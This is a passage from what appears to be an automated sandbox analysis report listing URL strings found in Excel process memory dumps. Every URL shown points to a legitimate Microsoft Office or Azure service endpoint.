Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://management.azure.com/t
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://management.azure.comv
Source: EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://messaging.office.com/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://nexus.officeapps.live.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
Source: EXCEL.EXE, 00000000.00000002.963180768.000000000FA50000.00000004.00000001.sdmp	String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordx
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://officeapps.live.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.com$
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.com.
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.com2
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.com4u
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.com7
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.comB
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.comRuU
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.comV
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.comX
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.comYh
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.comj
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.coms.dll7
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.coms.dll9
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.coms.dllh
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.comt
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.comx
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://officeapps.live.com~
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://officesetup.getmicrosoftkey.com&
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965819822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp	String found in binary or memory: https://omex.cdn.office.net/addinclassifie
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: EXCEL.EXE, 00000000.00000002.963180768.000000000FA50000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: EXCEL.EXE, 00000000.00000002.963180768.000000000FA50000.00000004.00000001.sdmp	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities.dllNt
Source: EXCEL.EXE, 00000000.00000002.963180768.000000000FA50000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseQ
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/embed?iom/
Source: EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://osi.office.net
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://osi.office.net(
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://osi.office.netN
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://osi.office.netst
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://outlook.office.com
Source: EXCEL.EXE, 00000000.00000002.965714297.0000000013354000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957360365.0000000013354000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://outlook.office.com/
